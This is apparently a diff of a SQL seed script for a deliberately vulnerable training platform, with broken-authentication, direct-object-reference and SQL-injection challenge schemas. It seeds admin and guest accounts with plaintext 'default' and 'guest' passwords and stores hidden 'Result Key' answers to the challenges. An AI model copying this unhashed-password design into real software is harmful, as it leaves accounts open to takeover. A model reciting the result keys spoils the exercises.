-VALUES (634, 'superuser', 'default', 'superman@security.com');
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com');
+USE `BrokenAuthAndSessMangChalTwo`;
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com');
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com');
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com');
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (634, 'superuser', 'default', 'superman@security.com');
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com');
COMMIT;
-- ======================================================
-- BrokenAuthAndSessMangChalThree
-- ======================================================
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalThree`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalThree`;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalThree` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalThree`;
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-- -----------------------------------------------------
-- Table `BrokenAuthAndSessMangChalThree`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalThree`.`users`
-(
- `userId`
- INT
- NOT
- NULL,
- `userName`
- VARCHAR
-(
- 32
-) NOT NULL ,
- `userPassword` VARCHAR
-(
- 128
-) NOT NULL ,
- `userAddress` VARCHAR
-(
- 128
-) NOT NULL ,
- `userRole` VARCHAR
-(
- 8
-) NOT NULL DEFAULT 'guest' ,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalThree`.`users` (
+ `userId` INT NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPassword` VARCHAR(128) NOT NULL ,
+ `userAddress` VARCHAR(128) NOT NULL ,
+ `userRole` VARCHAR(8) NOT NULL DEFAULT 'guest' ,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `BrokenAuthAndSessMangChalThree`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalThree`;
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (634, 'superuser', 'default', 'superman@security.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (40, 'guest1', 'default', 'guest1@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (41, 'guest2', 'default', 'guest2@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (42, 'guest3', 'default', 'guest3@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (43, 'guest4', 'default', 'guest4@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (44, 'guest5', 'default', 'guest5@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (45, 'guest6', 'default', 'guest6@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (46, 'guest7', 'default', 'guest7@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (47, 'guest8', 'default', 'guest8@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (48, 'guest9', 'guest', 'guest9@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (49, 'guest11', 'guest', 'guest11@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (50, 'guest12', 'guest', 'guest12@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (51, 'guest13', 'guest', 'guest13@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (52, 'guest14', 'guest', 'guest14@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (53, 'guest15', 'guest', 'guest15@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (54, 'guest16', 'guest', 'guest16@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (55, 'guest17', 'guest', 'guest17@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (56, 'guest18', 'guest', 'guest18@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (57, 'guest19', 'guest', 'guest19@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (58, 'guest20', 'guest', 'guest20@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (59, 'guest21', 'guest', 'guest21@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (60, 'guest22', 'guest', 'guest22@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (61, 'guest23', 'guest', 'guest23@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (62, 'guest10', 'guest', 'guest10@guest.com', 'guest');
+USE `BrokenAuthAndSessMangChalThree`;
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (634, 'superuser', 'default', 'superman@security.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (40, 'guest1', 'default', 'guest1@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (41, 'guest2', 'default', 'guest2@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (42, 'guest3', 'default', 'guest3@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (43, 'guest4', 'default', 'guest4@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (44, 'guest5', 'default', 'guest5@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (45, 'guest6', 'default', 'guest6@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (46, 'guest7', 'default', 'guest7@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (47, 'guest8', 'default', 'guest8@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (48, 'guest9', 'guest', 'guest9@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (49, 'guest11', 'guest', 'guest11@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (50, 'guest12', 'guest', 'guest12@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (51, 'guest13', 'guest', 'guest13@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (52, 'guest14', 'guest', 'guest14@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (53, 'guest15', 'guest', 'guest15@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (54, 'guest16', 'guest', 'guest16@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (55, 'guest17', 'guest', 'guest17@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (56, 'guest18', 'guest', 'guest18@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (57, 'guest19', 'guest', 'guest19@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (58, 'guest20', 'guest', 'guest20@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (59, 'guest21', 'guest', 'guest21@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (60, 'guest22', 'guest', 'guest22@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (61, 'guest23', 'guest', 'guest23@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (62, 'guest10', 'guest', 'guest10@guest.com', 'guest');
COMMIT;
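Review bot: The data blocks for `SqlChalThree`.`customers` and the two `BrokenAuthAndSessMangChal…`.`users` tables seed card-number-shaped values and plaintext `userPassword` values (`'default'`, `'guest'`), and nothing in the file says this is deliberate. These look like intentional challenge fixtures, so the data itself should stay. A one-line comment above each `START TRANSACTION;` would make that explicit, for example `-- Challenge fixture: synthetic values, deliberately weak; not real account or card data`. That keeps secret-scanner and audit findings on this file quick to triage and warns anyone reusing the schema that `userPassword` is stored unhashed on purpose.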
@@ -495,65 +292,41 @@ COMMIT;
-- directObjectRefChalOne
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `directObjectRefChalOne`;
-CREATE SCHEMA IF NOT EXISTS `directObjectRefChalOne` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`directObjectRefChalOne` ;
+DROP SCHEMA IF EXISTS `directObjectRefChalOne` ;
+CREATE SCHEMA IF NOT EXISTS `directObjectRefChalOne` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `directObjectRefChalOne` ;
-- -----------------------------------------------------
-- Table `directObjectRefChalOne`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `directObjectRefChalOne`.`users`
-(
- `userId` VARCHAR
-(
- 32
-) NOT NULL ,
- `userName` VARCHAR
-(
- 32
-) NOT NULL ,
- `privateMessage` MEDIUMTEXT NOT NULL ,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `directObjectRefChalOne`.`users` (
+ `userId` VARCHAR(32) NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `privateMessage` MEDIUMTEXT NOT NULL ,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `directObjectRefChalOne`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`directObjectRefChalOne`;
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('1', 'Paul Bourke', 'No Message Set');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('3', 'Will Bailey', 'I love Go Karting');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('5', 'Orla Cleary', 'As if!');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('7', 'Ronan Fitzpatrick', 'I have retired');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('9', 'Pat McKenana', 'I have a car!');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('11', 'Hidden User', 'Result Key is dd6301b38b5ad9c54b85d07c087aebec89df8b8c769d4da084a55663e6186742');
+USE `directObjectRefChalOne`;
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('1', 'Paul Bourke', 'No Message Set');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('3', 'Will Bailey', 'I love Go Karting');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('5', 'Orla Cleary', 'As if!');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('7', 'Ronan Fitzpatrick', 'I have retired');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('9', 'Pat McKenana', 'I have a car!');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('11', 'Hidden User', 'Result Key is dd6301b38b5ad9c54b85d07c087aebec89df8b8c769d4da084a55663e6186742');
COMMIT;
@@ -561,202 +334,109 @@ COMMIT;
-- directObjectRefChalTwo
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `directObjectRefChalTwo`;
-CREATE SCHEMA IF NOT EXISTS `directObjectRefChalTwo` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`directObjectRefChalTwo` ;
+DROP SCHEMA IF EXISTS `directObjectRefChalTwo` ;
+CREATE SCHEMA IF NOT EXISTS `directObjectRefChalTwo` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `directObjectRefChalTwo` ;
-- -----------------------------------------------------
-- Table `directObjectRefChalTwo`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `directObjectRefChalTwo`.`users`
-(
- `userId` VARCHAR
-(
- 32
-) NOT NULL ,
- `userName` VARCHAR
-(
- 32
-) NOT NULL ,
- `privateMessage` MEDIUMTEXT NOT NULL ,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `directObjectRefChalTwo`.`users` (
+ `userId` VARCHAR(32) NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `privateMessage` MEDIUMTEXT NOT NULL ,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `directObjectRefChalTwo`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`directObjectRefChalTwo`;
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('c81e728d9d4c2f636f067f89cc14862c', 'Joe Sullivan', 'I was going to set a message, but then I decided not to.');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('eccbc87e4b5ce2fe28308fd9f2a7baf3', 'Will Bailey', 'I love Go Karting');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('e4da3b7fbbce2345d7772b0674a318d5', 'Orla Cleary',
- 'As if Im going to set a message. Who knows who could read it!');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('8f14e45fceea167a5a36dedd4bea2543', 'Ronan Fitzpatrick', 'I have retired');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('6512bd43d9caa6e02c990b0a82652dca', 'Pat McKenana', 'I have a car!');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('c51ce410c124a10e0db5e4b97fc2af39', 'Hidden User',
- 'Result Key is 1f746b87a4e3628b90b1927de23f6077abdbbb64586d3ac9485625da21921a0f');
+USE `directObjectRefChalTwo`;
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('c81e728d9d4c2f636f067f89cc14862c', 'Joe Sullivan', 'I was going to set a message, but then I decided not to.');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('eccbc87e4b5ce2fe28308fd9f2a7baf3', 'Will Bailey', 'I love Go Karting');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('e4da3b7fbbce2345d7772b0674a318d5', 'Orla Cleary', 'As if Im going to set a message. Who knows who could read it!');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('8f14e45fceea167a5a36dedd4bea2543', 'Ronan Fitzpatrick', 'I have retired');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('6512bd43d9caa6e02c990b0a82652dca', 'Pat McKenana', 'I have a car!');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('c51ce410c124a10e0db5e4b97fc2af39', 'Hidden User', 'Result Key is 1f746b87a4e3628b90b1927de23f6077abdbbb64586d3ac9485625da21921a0f');
COMMIT;
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
-DROP SCHEMA IF EXISTS `SQLiC5Shop`;
-CREATE SCHEMA IF NOT EXISTS `SQLiC5Shop` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`SQLiC5Shop` ;
+DROP SCHEMA IF EXISTS `SQLiC5Shop` ;
+CREATE SCHEMA IF NOT EXISTS `SQLiC5Shop` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `SQLiC5Shop` ;
-- -----------------------------------------------------
-- Table `SQLiC5Shop`.`items`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`items`
-(
- `itemId`
- INT
- NOT
- NULL,
- `itemName`
- VARCHAR
-(
- 45
-) NULL,
- `itemCost` INT NULL,
- PRIMARY KEY
-(
- `itemId`
-))
- ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`items` (
+ `itemId` INT NOT NULL,
+ `itemName` VARCHAR(45) NULL,
+ `itemCost` INT NULL,
+ PRIMARY KEY (`itemId`))
+ENGINE = InnoDB;
-- -----------------------------------------------------
-- Table `SQLiC5Shop`.`coupons`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`coupons`
-(
- `couponId`
- INT
- NOT
- NULL,
- `perCentOff`
- INT
- NULL,
- `couponCode`
- VARCHAR
-(
- 128
-) NULL,
- `itemId` INT NOT NULL,
- PRIMARY KEY
-(
- `couponId`
-),
- INDEX `fk_coupons_items_idx`
-(
- `itemId` ASC
-),
- CONSTRAINT `fk_coupons_items`
- FOREIGN KEY
-(
- `itemId`
-)
- REFERENCES `SQLiC5Shop`.`items`
-(
- `itemId`
-)
+CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`coupons` (
+ `couponId` INT NOT NULL,
+ `perCentOff` INT NULL,
+ `couponCode` VARCHAR(128) NULL,
+ `itemId` INT NOT NULL,
+ PRIMARY KEY (`couponId`),
+ INDEX `fk_coupons_items_idx` (`itemId` ASC),
+ CONSTRAINT `fk_coupons_items`
+ FOREIGN KEY (`itemId`)
+ REFERENCES `SQLiC5Shop`.`items` (`itemId`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
- ENGINE = InnoDB;
+ENGINE = InnoDB;
-- -----------------------------------------------------
-- Table `SQLiC5Shop`.`vipCoupons`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`vipCoupons`
-(
- `vipCouponId`
- INT
- NOT
- NULL,
- `perCentOff`
- INT
- NULL,
- `couponCode`
- VARCHAR
-(
- 128
-) NULL,
- `itemId` INT NOT NULL,
- PRIMARY KEY
-(
- `vipCouponId`
-),
- INDEX `fk_vipCoupons_items1_idx`
-(
- `itemId` ASC
-),
- CONSTRAINT `fk_vipCoupons_items1`
- FOREIGN KEY
-(
- `itemId`
-)
- REFERENCES `SQLiC5Shop`.`items`
-(
- `itemId`
-)
+CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`vipCoupons` (
+ `vipCouponId` INT NOT NULL,
+ `perCentOff` INT NULL,
+ `couponCode` VARCHAR(128) NULL,
+ `itemId` INT NOT NULL,
+ PRIMARY KEY (`vipCouponId`),
+ INDEX `fk_vipCoupons_items1_idx` (`itemId` ASC),
+ CONSTRAINT `fk_vipCoupons_items1`
+ FOREIGN KEY (`itemId`)
+ REFERENCES `SQLiC5Shop`.`items` (`itemId`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
- ENGINE = InnoDB;
+ENGINE = InnoDB;
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
